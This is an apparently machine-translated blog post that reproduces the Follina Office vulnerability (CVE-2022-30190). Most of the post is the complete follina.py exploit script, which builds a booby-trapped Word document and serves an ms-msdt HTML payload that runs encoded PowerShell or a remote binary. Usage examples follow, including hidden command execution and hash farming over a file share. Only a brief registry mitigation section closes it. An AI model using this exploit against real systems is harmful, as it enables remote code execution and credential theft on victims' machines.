disclaimer ：

This article is only for study and research , It is strictly forbidden to use the content of this article to illegally operate other Internet applications , If it is used for illegal purposes , The consequences will be borne by you , All risks arising are not related to the author of this article , If you continue to read this article, you will follow this content by default .

CVE-2022-30190 Loophole recurrence

Summary of vulnerability ：

This vulnerability was first discovered in 2022 year 5 month 27 Japan , By a Belarusian IP Address upload . Malicious documents from Word Remote template function from remote Web Server Retrieval HTML file , adopt ms-msdt MSProtocol URI Method to execute malicious PowerShell Code . The infection process utilizes Windows Program msdt.exe, This program is used to run various Windows Troubleshooting package . The malicious document of this tool can call it without user interaction . This causes the macro to be disabled , Malicious documents can still be used ‘ms-msdt’ URI Carry out arbitrary PowerShell Code .

Affects version ：

At present, the known affected versions are ：

• office 2021 Lts

• office 2019

• office 2016

• Office 2013

• Office ProPlus

• Office 365

Loophole recurrence ：

Use what has been published on the Internet poc

https://github.com/chvancooten/follina.py

#!/usr/bin/env python3
import argparse
import os
import zipfile
import http.server
import socketserver
import base64

# Helper function to zip whole dir
# https://stackoverflow.com/questions/1855095/how-to-create-a-zip-archive-of-a-directory
def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            os.utime(os.path.join(root, file), (1653895859, 1653895859))
            ziph.write(os.path.join(root, file), 
                       os.path.relpath(
                            os.path.join(root, file), 
                            path
                       ))

if __name__ == "__main__":

    # Parse arguments
    parser = argparse.ArgumentParser()
    required = parser.add_argument_group('Required Arguments')
    binary = parser.add_argument_group('Binary Execution Arguments')
    command = parser.add_argument_group('Command Execution Arguments')
    optional = parser.add_argument_group('Optional Arguments')
    required.add_argument('-m', '--mode', action='store', dest='mode', choices={
    "binary", "command"},
        help='Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command', required=True)
    binary.add_argument('-b', '--binary', action='store', dest='binary', 
        help='The full path of the binary to run. Can be local or remote from an SMB share')
    command.add_argument('-c', '--command', action='store', dest='command',
        help='The encoded command to execute in "command" mode')
    optional.add_argument('-u', '--url', action='store', dest='url', default='localhost',
        help='The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"')
    optional.add_argument('-H', '--host', action='store', dest='host', default="0.0.0.0",
        help='The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)')
    optional.add_argument('-P', '--port', action='store', dest='port', default=80, type=int,
        help='The port to run the HTTP server on, defaults to 80')
    args = parser.parse_args()

    if args.mode == "binary" and args.binary is None:
        raise SystemExit("Binary mode requires a binary to be specified, e.g. -b '\\\\localhost\\c$\\Windows\\System32\\calc.exe'")


    if args.mode == "command" and args.command is None:
        raise SystemExit("Command mode requires a command to be specified, e.g. -c 'c:\\windows\\system32\\cmd.exe /c whoami > c:\\users\\public\\pwned.txt'")

    payload_url = f"http://{
      args.url}:{
      args.port}/exploit.html"

    if args.mode == "command":
        # Original PowerShell execution variant
        command = args.command.replace("\"", "\\\"")
        encoded_command = base64.b64encode(bytearray(command, 'utf-16-le')).decode('UTF-8') # Powershell life...
        payload = fr'''"ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{
      encoded_command}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""'''

    if args.mode == "binary":
        # John Hammond binary variant
        binary_path = args.binary.replace('\\', '\\\\').rstrip('.exe')
        payload = fr'"ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$({
      binary_path})/.exe\""'

    # Prepare the doc file
    with open("src/document.xml.rels.tpl", "r") as f:
        tmp = f.read()

    payload_rels = tmp.format(payload_url = payload_url)

    if not os.path.exists("src/clickme/word/_rels"):
        os.makedirs("src/clickme/word/_rels")

    with open("src/clickme/word/_rels/document.xml.rels", "w") as f:
        f.write(payload_rels)

    with zipfile.ZipFile('clickme.docx', 'w', zipfile.ZIP_DEFLATED) as zipf:
        zipdir('src/clickme/', zipf)

    print("Generated 'clickme.docx' in current directory")


    # Prepare the HTML payload
    if not os.path.exists("www"):
        os.makedirs("www")

    with open("src/exploit.html.tpl", "r") as f:
        tmp = f.read()

    payload_html = tmp.format(payload = payload)

    with open("www/exploit.html", "w") as f:
        f.write(payload_html)

    print("Generated 'exploit.html' in 'www' directory")


    # Host the payload
    class Handler(http.server.SimpleHTTPRequestHandler):
        def __init__(self, *args, **kwargs):
            super().__init__(*args, directory="www", **kwargs)

    print(f"Serving payload on {
      payload_url}")
    with socketserver.TCPServer((args.host, args.port), Handler) as httpd:
        httpd.serve_forever()

Usage method ：

python .\follina.py -h
usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] [-u URL] [-H HOST] [-p PORT]

options:
  -h, --help            show this help message and exit

Required Arguments:
  -m {command,binary}, --mode {command,binary}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -p PORT, --port PORT  The port to run the HTTP server on, defaults to 80
  
 Example ：
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe

# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes )
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

utilize ：

office Download address ：

https://otp.landian.vip/zh-cn/download.html

Because I am replicating in the virtual machine , So use the second 5 An example , This allows me to load my... Remotely HTML

python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

Put the generated document into the virtual machine and open it , Succeed in reproducing

Repair suggestions ：

Ban MSDT URL The protocol prevents the troubleshooter from starting as a link , Including links to the entire operating system . Still usable “ get help ” Other or additional troubleshooters in the application and system settings to access the troubleshooters . Follow these steps to disable ：

1. Run command prompt as Administrator .

2. To back up registry entries , Please execute the order “reg export HKEY_CLASSES_ROOT\ms-msdt filename ”

3. Carry out orders “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.

How to undo a solution

1. Run command prompt as Administrator .

2. To restore the registry key , Please execute the order “reg import filename”

Reference resources ：

https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e

https://www.t00ls.com/thread-65967-1-1.html

https://mp.weixin.qq.com/s/GjFG93PFROwbe8P1rtX6Qg